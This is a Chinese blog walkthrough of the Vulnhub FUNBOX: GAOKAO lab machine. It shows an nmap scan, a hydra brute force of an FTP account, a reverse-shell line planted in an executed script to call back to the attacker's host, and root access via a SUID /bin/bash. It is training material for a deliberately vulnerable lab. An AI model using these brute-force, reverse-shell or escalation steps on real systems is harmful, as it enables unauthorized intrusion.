Vulnhub-FUNBOX: GAOKAO渗透

2024-01-25 23:52
文章标签 渗透 vulnhub funbox gaokao

本文主要是介绍Vulnhub-FUNBOX: GAOKAO渗透,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

文章目录

  • 前言
    • 1、靶机ip配置
    • 2、渗透目标
    • 3、渗透概括
  • 开始实战
    • 一、信息获取
    • 二、爆破FTP服务
    • 三、GetShell
    • 四、提权

前言

由于在做靶机的时候,涉及到的渗透思路是非常的广泛,所以在写文章的时候都是挑重点来写,尽量的不饶弯路。具体有不不懂都的可以直接在文章下评论或者私信博主
 如果不会导入Vulnhub靶机和配置网络环境的话,请点我直达发车文章!


 👉本文靶机下载连接-戳我直接下载!👈

1、靶机ip配置

  • Kali IP:192.168.2.4
  • 靶机IP:192.168.2.7靶机ip获取方式如下图
    在这里插入图片描述

2、渗透目标

  • 获取到/root/目录下的flag文件

3、渗透概括

  1. ftp信息获取
  2. ftp服务爆破
  3. 通过ftp建立反弹shell
  4. /bin/bash的suid提权


开始实战

一、信息获取

使用nmap工具对靶机做基本的信息收集nmap -sS -sV -A -T4 -p- 靶机IP如下所示
在这里插入图片描述

可以看到,开放的几个端口分别是21/ftp 22/ssh 80/http 3306/mysql
21/ftp从扫描结果可以看到可以使用ftp的匿名用户anonymous登录,并且有一个welcome.msg的文件
22/sshssh可以直接pass掉了,这个版本基本上没有什么可利用的漏洞了,一般获取到了用户信息或者爆破才使用这个
80/http基本上大部分的漏洞都是存在于web服务上
3306/mysql是Mysql服务,后续如果获取到了一些用户信息可以用来爆破或者写马之类的

我们先看看21/ftp上的文件
我们通过如下方式下载welcome.msg文件
在这里插入图片描述

看看文件内容,如下图
在这里插入图片描述

发现了一个有意思的东西,这个文件内的内容其实就是在登录ftp时显示的消息,如下所示
发现了一个关键的信息,那就是有一个邮箱sky@funbox9其中sky可能是一个用户名
在这里插入图片描述

二、爆破FTP服务

我使用如下命令对ftp服务的sky用户进行爆破

hydra -l sky -P /usr/share/wordlists/rockyou.txt -t 32 192.168.2.7 ftp

如下所示,sky用户的密码是thebest
在这里插入图片描述

我们使用获得的账户密码登录该靶机的ftp服务
如下所示,登录成功之后该用户的目录下有一个user.flag的文件,我们使用get命令将其下载
在这里插入图片描述

我们看看下载好的user.flag文件
如下所示,这段内容是sh脚本文件,貌似会被执行,那么这里就有操作的空间了
在这里插入图片描述

三、GetShell

我们编辑下载下来的user.flag文件,改为如下内容(反弹shell)

#!/bin/sh
/bin/bash -i >& /dev/tcp/192.168.2.4/1234 0>&1

在这里插入图片描述

我们再次登录ftp服务,将编辑完之后的user.flag文件上传
在这里插入图片描述

使用nc -lvvp 1234监听一下反弹shell
在这里插入图片描述

然后再次登录ftp随便输入个账户即可
在这里插入图片描述

如下所示,我们的nc即可监听到反弹过来的shell
使用whoami命令发现当前是sarah用户
我们再使用python3 -c 'import pty;pty.spawn("/bin/bash")'命令升级一下shell
在这里插入图片描述

四、提权

使用sudo -l发现需要密码,我们并不知道密码,就先放弃
在这里插入图片描述

我们使用如下命令找找具有suid权限的命令

find / -perm -u=s -exec ls -al {} \; 2>/dev/null

结果如下所示/bin/bash具有suid权限,那么我们就可以利用这个提权
在这里插入图片描述

如下所示,我们使用/bin/bash即可成功提权到root
在这里插入图片描述

如下所示,我们切换到/root目录
获取flag文件root.flag即完成该靶机的渗透
在这里插入图片描述

这篇关于Vulnhub-FUNBOX: GAOKAO渗透的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/645033

相关文章

【工具分享】针对加解密综合利用后渗透工具 - DecryptTools

下载地址: 链接: https://pan.quark.cn/s/2e451bd65d79 工具介绍 支持22种OA、CMS 加解密+密码查询功能 万户OA用友NC金蝶EAS蓝凌OA致远OA宏景ERP湖南强智金和jc6 瑞友天翼金和C6 Navicat华天动力 FinalShell亿赛通帆软报表H3C CASWeblogic金蝶云星空新华三IMC金盘 OP

内网渗透—横向移动非约束委派约束委派

前言 今天依旧是横向移动的内容,委派主要分为三类非约束委派、约束委派、资源委派。今天主要讲前面两个内容,资源委派留到最后再讲。 实验环境 Web:192.168.145.137,192.168.22.28DC:192.168.22.30 非约束委派 原理 原理很简单,当DC访问具有非约束委派权限的主机A时,会把当前域管理员账户的TGT放在ST票据中,然后一起发给主机A。主机A会把TG

红日靶场----(四)1.后渗透利用阶段

使用Metasploit进入后渗透利用阶段     一旦我们获取了目标主机的访问权限,我们就可以进入后渗透利用阶段,在这个阶段我们收集信息,采取措施维护我们的访问权限,转向其他机器     Step01:上线MSF(通过metasploit获取目标系统的会话-即SHELL) 常用选项-p //指定生成的Payload--list payload //列出所支持的Payload类

【渗透测试专栏】1.2认证和授权类-越权访问(水平/垂直越权)

该系列专栏旨在让漏洞检测变得更简单,只用于学习用途 靶机环境请看专栏前言专栏前言-WooYun漏洞库环境搭建-CSDN博客 目录 该系列专栏旨在让漏洞检测变得更简单,只用于学习用途 一、漏洞描述 1、水平越权 2、垂直越权 二、漏洞级别 三、漏洞检测方法 漏洞修复 一、漏洞描述 偏业务漏洞 1、水平越权 水平越权指的是在同一权限级别下,用户可以访问其他用户的资源或

渗透中的文件上传与下载

有时候拿下一台机器的控制权,需要在这台主机上传一些东西;有时候也会碰到不能直接上传只能通过命令行执行的shell,这就需要将shell下载下来。 目录 利用powershell进行文件上传下载 利用bitsadmin命令进行文件下载 利用certutil命令上传下载文件 利用wget命令上传下载文件 利用powershell进行文件上传下载 # 下载脚本并在内存中执行pow

【网络安全 | 渗透工具】Cencys+Shodan使用教程

原创文章,不得转载。 文章目录 Cencys准备语法全文搜索字段和值搜索通配符搜索布尔逻辑搜索嵌套搜索时间相关搜索范围搜索双引号 (")转义序列和保留字符 Censys 搜索语言中的主机查询查看主机搜索结果Censys 搜索语言中的证书查询查看证书搜索结果生成报告其余 Shodan准备使用语法查看设备详情 Cencys Censys 是一个强大的互联网搜索引擎和数据平台

97.WEB渗透测试-信息收集-Google语法(11)

免责声明:内容仅供学习参考,请合法利用知识,禁止进行违法犯罪活动! 内容参考于: 易锦网校会员专享课 上一个内容:96.WEB渗透测试-信息收集-Google语法(10) 2 、找上传类漏洞地址: • site:xxx.com inurl:file 打开搜索引擎搜索 site:qimai.cn inurl:file 搜索不到就是不存在 • site:xxx.com in

Tomato靶场渗透测试

1.扫描靶机地址 可以使用nmap进行扫描 由于我这已经知道靶机地址 这里就不扫描了 2.打开网站 3.进行目录扫描 dirb    http://172.16.1.113 发现有一个antibot_image目录 4.访问这个目录 可以看到有一个info.php 5.查看页面源代码 可以发现可以进行get传参 6.尝试查看日志文件 http://172.16

渗透测试学习资源

burp学院 https://portswigger.net/burp/documentation/desktop/getting-started https://portswigger.net/web-security/ hacker101学院 https://www.hacker101.com/ https://github.com/bugcrowd/bugcrowd_universit

使用Proxifer和Burpsuite软件搭配对小程序做渗透测试

1. 前言     在当今的移动互联网领域,小程序凭借其轻巧便捷的特性,快速赢得了用户和开发者的青睐。但伴随小程序的广泛应用,安全隐患也逐渐浮出水面。为有力保障小程序的安全性能,渗透测试已成为关键的举措。接下来,本文将详细阐述如何运用 Proxifer 和 Burpsuite 这两款强大的工具,来对小程序展开渗透测试。 2. 工具下载与配置 2.1 工具下载 工具1: